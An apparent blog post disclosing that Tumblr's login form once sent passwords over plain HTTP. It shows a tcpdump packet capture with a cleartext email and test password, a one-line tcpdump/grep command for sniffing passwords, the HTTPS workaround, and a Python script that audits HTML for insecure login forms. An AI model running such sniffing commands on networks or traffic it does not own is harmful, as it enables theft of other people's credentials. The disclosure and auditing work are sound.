The Problem
Before you read this, know that there's a solution and a secure way to log in!
I was playing with some Tumblr stuff when I saw that you had to POST to a non-HTTPS URL. Curious, I checked the web interface. Not an s in sight (or shall I say site?).
See for yourself! Here’s my session:
# tcpdump host tumblr.com -A > dump
The output? I'm showing only the first few packets.
00:31:50.114587 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [S], seq 837835235, win 5840, options [mss 1460,sackOK,TS val 74876566 ecr 0,nop,wscale 6], length 0
E...u@.@..=…e.x…z.P1.Y……….~………
.v……….
00:31:50.171209 IP 82.ee.78ae.static.theplanet.com.www > loki.40826: Flags [S.], seq 4227640120, ack 837835236, win 5792, options [mss 1460,sackOK,TS val 1707915338 ecr 74876566,nop,wscale 7], length 0
E....@.0….x…..e.P.z…81.Y…..VO………
e..J.v……
00:31:50.171231 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [.], ack 1, win 92, options [nop,nop,TS val 74876580 ecr 1707915338], length 0
E..4.v@.@..D…e.x…z.P1.Y….9….Q…..
.v..e..J
00:31:50.171285 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [P.], seq 1:892, ack 1, win 92, options [nop,nop,TS val 74876580 ecr 1707915338], length 891
E….w@.@……e.x…z.P1.Y….9……….
.v..e..JPOST /login HTTP/1.1
Host: www.tumblr.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: chrome://global/locale/intl.properties
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tumblr.com/login
Cookie: __qca=P0-1420853879-1284124906103; tmgioct=BAewmVEkOJLKWMzD3hOtaO58; __utma=189990958.1074509574.1289975502.1291266642.1291266971.26; __utmz=189990958.1291262948.24.20.utmcsr=assets.tumblr.com|utmccn=(referral)|utmcmd=referral|utmcct=/iframe.html; logged_in=0; __utmb=189990958.28.10.1291266971; __utmc=189990958
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
email=paultag%40gmail.com&password=THISISATEST
00:31:50.262046 IP 82.ee.78ae.static.theplanet.com.www > loki.40826: Flags [.], ack 892, win 60, options [nop,nop,TS val 1707915433 ecr 74876580], length 0
E..4.L@.0..o.x…..e.P.z…91.]_……….
e….v..
Wait, shit. What?
Let me go back and highlight the relevant part.
email=paultag%40gmail.com&password=THISISATEST
Crap.
I’ve totally been using this at my University, and I know for a fact that it’s not hard to drop a network interface into promiscuous mode. There goes my old tumblr password.
Here’s a proof of concept exploit:
# tcpdump host tumblr.com -A | tr "&" "\n" | sed "s/=/: /g" | grep password
This will work through all the packets that the kernel passes out. If you know what you're doing (and I really, really do not, and will not, go into how to do this), you can snoop all the packets that reach your network interface.
Solution (via Tumblr support)
So, what can you do to avoid all this? I asked Tumblr support, and they told me that they’re working on ramping up capacity for the SSL server. In the meantime, you can log in via the secure login. Please use it. I don’t want to see your passwords.
Those paying attention will notice the HTTP + SSL URL. For those who did not see the href above, the URL is:
https://www.tumblr.com/login
and not:
http://www.tumblr.com/login
BTW, tumblr support rocks so much.
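If you run a site of your own, the same mistake is easy to audit for. The following is an added example (not code from this post, from Tumblr, or from any library): it parses a page's HTML with the Python standard library, resolves each form's action against the page URL the way a browser does, and reports any form with a password field whose submission would not go over https. The page URL and the sample HTML are constructed.

```python
# Added example (not from the original post): audit HTML for login forms that
# would submit a password over plain HTTP. Uses only the standard library; the
# sample HTML below is constructed.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []        # dicts: {"action": str, "password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing action means the browser submits to the page URL itself.
            self._current = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def insecure_login_forms(page_url, html):
    """Resolved action URLs of password forms whose submission is not over https."""
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue
        # Resolve relative actions against the page URL, as a browser would.
        target = urljoin(page_url, form["action"])
        if urlsplit(target).scheme.lower() != "https":
            findings.append(target)
    return findings


# Constructed sample: the plain-HTTP login form from the post beside a secure one.
SAMPLE_HTML = """
<form method="post" action="/login"><input name="email">
  <input type="password" name="password"></form>
<form method="post" action="https://www.tumblr.com/login"><input name="email">
  <input type="PASSWORD" name="password"></form>
<form method="post" action="http://www.tumblr.com/search"><input name="q"></form>
"""
print(insecure_login_forms("http://www.tumblr.com/login", SAMPLE_HTML))
```

Only the first form is reported: it posts to the relative path /login, which resolves to the plain-HTTP page URL, while the second posts to the https URL and the third has no password field.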